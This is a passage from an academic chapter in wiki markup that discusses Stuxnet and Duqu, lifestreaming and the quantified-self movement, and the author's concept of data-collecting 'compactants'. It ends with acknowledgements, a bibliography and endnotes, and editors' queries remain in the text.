**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
